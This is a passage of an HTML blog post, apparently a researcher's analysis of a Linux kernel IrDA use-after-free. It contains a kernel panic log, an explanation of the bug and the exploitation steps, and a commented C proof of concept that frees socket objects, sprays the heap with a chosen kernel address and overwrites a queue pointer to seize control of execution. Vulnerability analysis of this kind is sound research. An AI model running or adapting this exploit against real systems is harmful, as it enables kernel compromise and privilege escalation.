id=\"crayon-5bad57622f369705235707-43\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_sys_open<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x116<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-44\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SyS_openat<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xf<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bad57622f369705235707-45\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-46\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0033<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x44769e<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-47\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00007ffc4d7f1b00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000246<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ORIG_RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-48\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffffffffffda <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006d18d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000044769e<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-49\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000004a8a46<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffffffffffff9c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-50\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000070<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000001<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000000000c<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-51\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000246<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006d1880<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-52\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000065<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006d18d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-53\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Code<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-i\">cc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">68<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-54\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffff88023623ad20<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001437b60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-55\">[ 8.642882] CR2: ffff88023623ad20<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-56\">[ 8.642882] ---[ end trace 531b1224dce05ac9 ]---<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-57\">[ 8.642882] Kernel panic - not syncing: Fatal exception<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-58\">[ 8.642882] Kernel Offset: disabled<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-59\">[ 8.642882] Rebooting in 1 seconds..<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>In order to completely control the execution, we must look for an object that holds a pointer to function pointers, which can be achieved with an information leak.<\/p>\n<p>The first &#8220;bug&#8221; (double bind and losing the reference to ias_obj) is not required to exploit the UAF (reinsertion of the same object into the hashbin queue). 
It has no relevance to the exploitation chain demonstrated in the PoC and UAF can be exploited without it.<\/p>\n<p>Binding the same socket would result in the following path taken (since self-&gt;tsap is already set):<\/p>\n<div id=\"crayon-5bad57622f378462779655\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f378462779655-1\">err = irda_open_tsap(self, addr-&gt;sir_lsap_sel, addr-&gt;sir_name);<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f378462779655-2\">if (err &lt; 0) {<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f378462779655-3\">    irias_delete_object(self-&gt;ias_obj);<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f378462779655-4\">    self-&gt;ias_obj = NULL;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f378462779655-5\">    goto out;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f378462779655-6\">}<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/div>\n<p>In the PoC, binding socket 1 twice would simply leave the first allocated object in the queue and set self-&gt;ias_obj (for socket 1) to 
NULL.<\/p>\n<p>The exploitation procedure detailed earlier in this post is different from the actual PoC:<br \/> &#8211; Create 4 socket files via socket()<br \/> &#8211; bind socket 1 to 3, this will allocate and insert objects into irias_objects<br \/> &#8211; bind 1 again, this will trigger the first bug<br \/> &#8211; insert socket 2 &amp; 3 many times (~5)<br \/> &#8211; close socket 2, then 3, this will free sockets and you should see the ias object of socket 3 freed but still queued in the list [!]<br \/> &#8211; Spray the heap to fill the freed object with our payload, now we have control over obj-&gt;q.q_(next\/prev)<br \/> &#8211; bind socket 4, this is \u2018what\u2019 pointer to put in the controlled object (obj-&gt;q.q_prev)<br \/> &#8211; close socket 4 to free the last object<br \/> &#8211; Spray the heap again to control the object<br \/> &#8211; Trigger the overwritten pointer, and you\u2019ll get RIP<\/p>\n<p>The [!] step is different from the PoC, which closes sock 3 first and then sock 2. That makes a big difference. Closing sock 2 first would leave a single obj_ias for sock 3 in the queue (links to sock 1 object will be lost). This will not lead to an exploitable UAF case.<\/p>\n<p>Reinserting ias_obj for sock 2 &amp; 3 many times (~5) is not needed. You&#8217;re repeating the same operations without affecting the queue layout. 
To make the whole process clearer, here&#8217;s the original PoC with comments:<\/p>\n<div id=\"crayon-5bad57622f37f374049301\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">fd1 = socket(0x17,0x5,0);\nfd2 = socket(0x17,0x5,0);\nfd3 = socket(0x17,0x5,0);\nfd4 = socket(0x17,0x5,0);\n\n\/* create namespace for xfrm\n * this is not required to trigger the bug\n *\/\ncreate_ns();\n\nirda_bind(fd1,4,0x4a,0x3,\"c\");\n\nint i;\n\nirda_bind(fd2,4,0x4b,0x3,\"c\");\nirda_bind(fd3,4,0x4c,0x3,\"c\");\n\/* at this point there're 3 objects in the queue. refer to fig1 for the queue\n * layout*\/\n\nirda_bind(fd1,4,0x4a,0x3,\"c\");\n\/* binding s1 again results in self-&gt;ias-&gt;obj (for s1) being set to NULL.\n * However, it does not affect the layout of the queue! *\/\n\n\n\/* repeated reinsertion of sock 2 and 3 objects 5 times doesn't make any sense.\n * These operations are redundant. It's only needed to reinsert 2 and 3 once.\n * see fig2 for the queue layout after reinserting ias_obj for sock 2 and fig3\n * for after reinserting ias_obj for sock 3. *\/\nfor(i=0;i&lt;5;i++) {\n    \/* 0x00 means that it takes self-&gt;ias_obj *\/\n    irda_set_ias(fd2,\"\\x00\");\n    irda_set_ias(fd3,\"\\x00\");\n}\n\n\/* Again, closing sock 1 has no effect on the queue layout. The reference to\n * the sock 1 object is lost because of the double bind earlier *\/\nclose(fd1);\n\n\/* Trace dequeue_general() and you should get the queue layout in fig4 *\/\nclose(fd3);\n\n\/* annoying the queue and free the first queued object*\/\nprintf(\"[+] Freeing the first queued ias object \\n\");\n\n\/* THIS IS WHERE THE FIRST UAF HAPPENS. You're overwriting the q_prev ptr in\n * the freed sock 3 object with the address of the sock 1 object. Trace\n * dequeue_general() again *\/\nclose(fd2);\n\n\/\/getchar();\nsleep(1);\n\/* By the time you start the spray, the q_prev ptr in the sock 3 object is\n * already overwritten. In some cases you get lucky and there's no object\n * allocated where sock 3 object was, so you're overwriting bytes 8 to 16 of\n * some unallocated object. If this was q_next for example, then you'd be\n * overwriting the freelist ptr and corrupting the slab.\n\n * Note that when you get \"unlucky\" and some object is already allocated at the\n * sock 3 object address, you're overwriting bytes 8 to 16 of that object with\n * address of sock 1 obj.\n *\/\n\n\/* If the target object is still not allocated at this point, the spray would\n * reset q_prev value to the target address (e.g., 0xdeadbeef in the example).\n *\/\nunsigned char *buf = malloc(4096);\npid_t pid;\nu_int64_t addr = 0xffffffff81f01500;\naddr = 0xffffffff81efeb60;\n\/\/addr = 0xdeadbeef;\naddr = target_addr;\nvoid *x = &amp;addr;\nmemset(buf,0xcc,88);\n*(void **)(buf+8) = (void*)addr;\n\nprintf(\"[+] Spray memory and take control of the old freed object\\n\");\nspray_heap(buf,88,200);\nusleep(10000);\n\nprintf(\"[+] Allocating new object to overwrite the targetted pointer\\n\");\n\n\/* Now inserting sock 4 obj would trigger your first oops message on\n * dereferencing q_prev (0xdeadbeef) on the enqueue_first() path\n * (*queue)-&gt;q_prev-&gt;q_next = element\n *\n * where queue head is pointing to the sprayed object.\n *\n * The rest is not relevant.\n *\/\nirda_bind(fd4,4,0x30,0x3,\"c\");\nprintf(\"[+] Freeing object again \\n\");\nclose(fd4);\nsleep(1);\nprintf(\"[+] Fill the last object with payload \\n\");\nmemset(buf,0xcc,88);\nspray_heap(buf,88,200);\n\nusleep(1000);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; 
-o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-1\">fd1 = socket(0x17,0x5,0);<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-2\">fd2 = socket(0x17,0x5,0);<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-3\">fd3 = socket(0x17,0x5,0);<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-4\">fd4 = socket(0x17,0x5,0);<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-6\">\/* create namespace for xfrm<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-7\"> * this is not required to trigger the bug<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-8\"> *\/<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-9\">create_ns();<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-11\">irda_bind(fd1,4,0x4a,0x3,\"c\");<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-13\">int i;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-15\">irda_bind(fd2,4,0x4b,0x3,\"c\");<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-16\">irda_bind(fd3,4,0x4c,0x3,\"c\");<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-17\">\/* at this point there're 3 objects in the queue. refer to fig1 for the queue<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-18\"> * layout*\/<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-20\">irda_bind(fd1,4,0x4a,0x3,\"c\");<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-21\">\/* binding s1 again results in self-&gt;ias-&gt;obj (for s1) being set to NULL.<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-22\"> * However, it does not affect the layout of the queue! *\/<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-25\">\/* repeated reinsertion of sock 2 and 3 objects 5 times doesn't make any sense.<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-26\"> * These operations are redundant. It's only needed to reinsert 2 and 3 once.<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-27\"> * see fig2 for the queue layout after reinserting ias_obj for sock 2 and fig3<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-28\"> * for after reinserting ias_obj for sock 3. *\/<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-29\">for(i=0;i&lt;5;i++) {<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-30\">    \/* 0x00 means that it takes self-&gt;ias_obj *\/<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-31\">    irda_set_ias(fd2,\"\\x00\");<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-32\">    irda_set_ias(fd3,\"\\x00\");<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-33\">}<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-35\">\/* Again, closing sock 1 has no effect on the queue layout. The reference to<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-36\"> * the sock 1 object is lost because of the double bind earlier *\/<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-37\">close(fd1);<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-39\">\/* Trace dequeue_general() and you should get the queue layout in fig4 *\/<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-40\">close(fd3);<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-42\">\/* annoying the queue and free the first queued object*\/<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-43\">printf(\"[+] Freeing the first queued ias object \\n\");<\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bad57622f37f374049301-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-45\"><span class=\"crayon-c\">\/* THIS IS WHERE THE FIRST UAF HAPPENS. You&#8217;re overwriting the q_prev ptr in<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-46\"><span class=\"crayon-c\">* the freed sock 3 object with the address of the sock 1 object. Trace<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-47\"><span class=\"crayon-c\">* dequeue_general() again *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-48\"><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-49\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-50\"><span class=\"crayon-c\">\/\/getchar();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-51\"><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-52\"><span class=\"crayon-c\">\/* By the time you start the spray, the q_prev ptr in the sock 3 object is<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-53\"><span class=\"crayon-c\">* already overwritten. 
In some cases you get lucky and there&#8217;s no object<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-54\"><span class=\"crayon-c\">* allocated where sock 3 object was, so you&#8217;re overwriting bytes 8 to 16 of<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-55\"><span class=\"crayon-c\">* some unallocated object. If this was q_next for example, then you&#8217;d be<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-56\"><span class=\"crayon-c\">* overwriting the freelist ptr and corrupting the slab.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-57\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-58\"><span class=\"crayon-c\">* Note that when you get &#8220;unlucky&#8221; and some object is already allocated at the<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-59\"><span class=\"crayon-c\">* sock 3 object address, you&#8217;re overwriting bytes 8 to 16 of that object with<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-60\"><span class=\"crayon-c\">* address of sock 1 obj.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-61\"><span class=\"crayon-c\">*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-63\"><span class=\"crayon-c\">\/* If the target object is still not allocated at this point, the spray would<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-64\"><span class=\"crayon-c\">* reset q_prev value to the target address (e.g., 0xdeadbeef in the example).<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-65\"><span 
class=\"crayon-c\">*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-66\"><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-67\"><span class=\"crayon-e\">pid_t <\/span><span class=\"crayon-v\">pid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-68\"><span class=\"crayon-e\">u_int64_t <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span 